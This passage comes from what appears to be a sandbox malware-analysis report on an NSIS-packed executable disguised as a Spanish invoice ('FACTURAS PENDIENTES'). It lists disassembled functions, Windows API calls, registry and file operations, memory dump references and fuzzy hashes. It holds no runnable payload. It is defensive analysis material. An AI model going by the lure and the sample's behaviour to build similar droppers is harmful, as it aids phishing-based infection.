                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                  • API String ID: 2547128583-890815371
                                  • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                  • Instruction ID: 8df058e233f66e35bffb69da01c296363a0ab298929cdf7fbd230430fe9e2c9f
                                  • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                  • Instruction Fuzzy Hash: BAD05B371022159BC7012F62AE0895F776DEF56351705443AF541F7270DB38D82295FD
                                  Function 00405E19 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E5A
                                  • GetLastError.KERNEL32 ref: 00405E64
                                  • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                  • GetLastError.KERNEL32 ref: 00405E8B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID:
                                  • API String ID: 3449924974-0
                                  • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                  • Instruction ID: 2395f8a8d7837bad9ab877b1c5b4dd478f8f3e4f7c6de220d66e2a00ae86bb09
                                  • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                  • Instruction Fuzzy Hash: A201EC75D00609DFDB109FA0DA44BAE7BB4EF14315F10453AD989F2190D7789648CF99
                                  Function 00406952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405F99), ref: 00406999
                                  • RegCloseKey.ADVAPI32(?), ref: 004069A4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: Call
                                  • API String ID: 3356406503-1824292864
                                  • Opcode ID: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                  • Instruction ID: 602e610a5625c9c57cce2cfaa1a97c2955b97914b1987e410d3f2042aedcb8ce
                                  • Opcode Fuzzy Hash: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                  • Instruction Fuzzy Hash: 65015EB652010ABADF218FA4DD06EEF7BE8EF44754F11013AF801E22A0D374DA64DB94
                                  Function 00406613 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                    • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406BAF
                                    • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                    • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                    • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                  • GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                    • Part of subcall function 004065AA: FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                    • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                  • String ID: HZB
                                  • API String ID: 1879705256-1498320904
                                  • Opcode ID: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                  • Instruction ID: c1f6674fc9072460158ec6ac158274c55d6247b1d16a8c1a13e9c8cd3e3f7c83
                                  • Opcode Fuzzy Hash: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                  • Instruction Fuzzy Hash: 60F0C2715016612AC62033762E89A2B255C8E2136979B4F3FFD97F22D2CA3ECC31956D
                                  Function 00405DF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                  • GetLastError.KERNEL32 ref: 00405E0B
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1375471231-823278215
                                  • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                  • Instruction ID: 45d9b0881c8677af27f94d707b600064aa91ade8dc0fdf8d2bf4d46db956c495
                                  • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                  • Instruction Fuzzy Hash: 15C012316000309BC7601B65AE089477E94DB547A13064639B988E1110D6304C5486D8
                                  Function 00406E83 Relevance: 5.2, APIs: 4, Instructions: 241COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                  • Instruction ID: 522defa19930b26a7af3553485d7a536a03fd017600a111de47fbc571b524dd9
                                  • Opcode Fuzzy Hash: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                  • Instruction Fuzzy Hash: 4B913371A0C3818BE364CF29C480B6BBBE1AFC9344F10892EE5D997390E774A805CB57
                                  Function 7347167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 73472351: GlobalFree.KERNEL32(?), ref: 73472A44
                                    • Part of subcall function 73472351: GlobalFree.KERNEL32(?), ref: 73472A4A
                                    • Part of subcall function 73472351: GlobalFree.KERNEL32(?), ref: 73472A50
                                  • GlobalFree.KERNEL32(00000000), ref: 73471738
                                  • FreeLibrary.KERNEL32(?), ref: 734717C3
                                  • GlobalFree.KERNEL32(00000000), ref: 734717E9
                                    • Part of subcall function 73471FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 73471FFA
                                    • Part of subcall function 734717F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,73471708,00000000), ref: 7347189A
                                    • Part of subcall function 73471F1E: wsprintfW.USER32 ref: 73471F51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                  • String ID:
                                  • API String ID: 3962662361-0
                                  • Opcode ID: 0cd0fac79f4571c499f5537e9e3e5c177396a2323968fd32b082a4316a648ad7
                                  • Instruction ID: 38bb4e8f344b7dfa015c37a6c5027bbf0d850ce2cfd0e21bfdf416ec19d2fe82
                                  • Opcode Fuzzy Hash: 0cd0fac79f4571c499f5537e9e3e5c177396a2323968fd32b082a4316a648ad7
                                  • Instruction Fuzzy Hash: 4341D07240038DAFEB2CAF24C884BDA37FDFB40311F14441DF94E9A281DB74A649D668
                                  Function 00401D01 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalFree.KERNEL32(0052FF40), ref: 00401D81
                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$AllocFreelstrcat
                                  • String ID: Call
                                  • API String ID: 238967769-1824292864
                                  • Opcode ID: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                  • Instruction ID: 3a6eff4e9616495b68701e132b411bef72aa922240f6375a3907340b29510e26
                                  • Opcode Fuzzy Hash: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                  • Instruction Fuzzy Hash: 7111DF72A12310EBD720AF54DD80A2B73A8FF45718B05443FF946B72D1D738A8109BAE
                                  Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                  • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Enum$CloseValue
                                  • String ID:
                                  • API String ID: 397863658-0
                                  • Opcode ID: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                  • Instruction ID: 511bfc2a391466f7e6c467a51680e698ffc79b74a509a4b58bb4b7d47538cca8
                                  • Opcode Fuzzy Hash: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                  • Instruction Fuzzy Hash: 8D01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A
                                  Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnC132.tmp,?,?,00000011,00000002), ref: 0040271D
                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID:
                                  • API String ID: 3356406503-0
                                  • Opcode ID: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                  • Instruction ID: 691293788ab813f7a02a0c784ea8aced05bc34a113cec979fc9dae3080cb0c68
                                  • Opcode Fuzzy Hash: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                  • Instruction Fuzzy Hash: 4911A035658302AED7548FA4DA88A2BB3A4EF84315F10053FF142A21D1D7B85909CB5B
                                  Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                  • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 4a227ca3b38513ddfb18d8d58b55d7f5df30190cf1bb37be781ef323b2e94d58
                                  • Instruction ID: e1306000d3193007dcaf3fb318de5d2d5eb9708196255911654f78f844dcab6e
                                  • Opcode Fuzzy Hash: 4a227ca3b38513ddfb18d8d58b55d7f5df30190cf1bb37be781ef323b2e94d58
                                  • Instruction Fuzzy Hash: CB01D472B152309BD7296F2DEC09B2B2699A780711F55453EF901F72F1DBB89C02875C
                                  Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CloseDeleteValue
                                  • String ID:
                                  • API String ID: 2831762973-0
                                  • Opcode ID: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                  • Instruction ID: 38e38bfe0db84342a76dd61cbaa190e5b367477f23a550be25d98ac167cb56e2
                                  • Opcode Fuzzy Hash: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                  • Instruction Fuzzy Hash: D5F02433645600A7E310ABA49D4AA7E765DAF903A2F11053FF642A61C4CE7E8C46862D
                                  Function 004068F6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
